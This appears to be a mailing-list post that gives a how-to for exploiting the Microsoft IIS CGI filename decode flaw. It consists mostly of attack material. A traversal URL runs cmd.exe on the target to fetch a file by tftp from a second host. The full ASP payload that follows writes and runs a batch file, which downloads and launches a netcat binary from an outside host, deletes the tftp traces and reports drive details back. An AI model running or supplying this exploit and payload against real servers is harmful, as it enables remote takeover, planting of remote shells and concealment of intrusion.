Microsoft IIS CGI Filename Decode Error V - How to

[Adriano Dias <adias () proteus com br>]

Thats what I did:
http://192.168.0.1/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.ex
e?/c+tftp.exe+-i+192.168.0.2+GET+f.asp+c:\inetpub\scripts\f.asp

then i ran http://192.168.0.1/f.asp

following is a copy of the f.asp:


----------cut here-------------------------
<%
Set fs = CreateObject("Scripting.FileSystemObject")
Set drv = fs.Drives
dmax = ""
dmac = 0
For each d in drv
If d.Driveletter <> "A" And d.IsReady Then
If d.AvailableSpace > dmac then
dmac = d.AvailableSpace
dmab = d.DriveType
dmaa = d.TotalSize
dmad = d.SerialNumber
dmax = d.DriveLetter
End If
End If
Next
filename = server.mappath("dl.bat")
Set tf = fs.CreateTextFile(filename, True)
tf.WriteLine("@echo off")
tf.WriteLine("cd \Inetpub\scripts")
tf.WriteLine("startDL:")
tf.WriteLine("tftp.exe -i 192.168.1.33 get ncx99.exe
c:\inetpub\scripts\nc0.exe")
tf.WriteLine("if not exist ncx99.exe goto startDL")
tf.WriteLine("start /w nc0.exe")
tf.WriteLine("attrib TFTP* -r")
tf.WriteLine("attrib nc0.exe -r")
tf.WriteLine("del TFTP*")
tf.WriteLine("exit")
tf.Close
dim command
dim wshShell
command = server.mappath("dl.bat") & " " & dmax
On Error Resume Next
Set wshShell = CreateObject("WScript.Shell")
wshShell.Run (command)
If Err Then
Set objFSO = Server.CreateObject("scripting.filesystemobject")
pathname = server.mappath("dl.bat")
objFSO.DeleteFile pathname
Set objFSO = Nothing
Else
Response.Write "|" & dmax & "*" & dmab & "*" & dmac & "*" & dmaa & "*" &
dmad
End If
%>

-----------cut here----------------------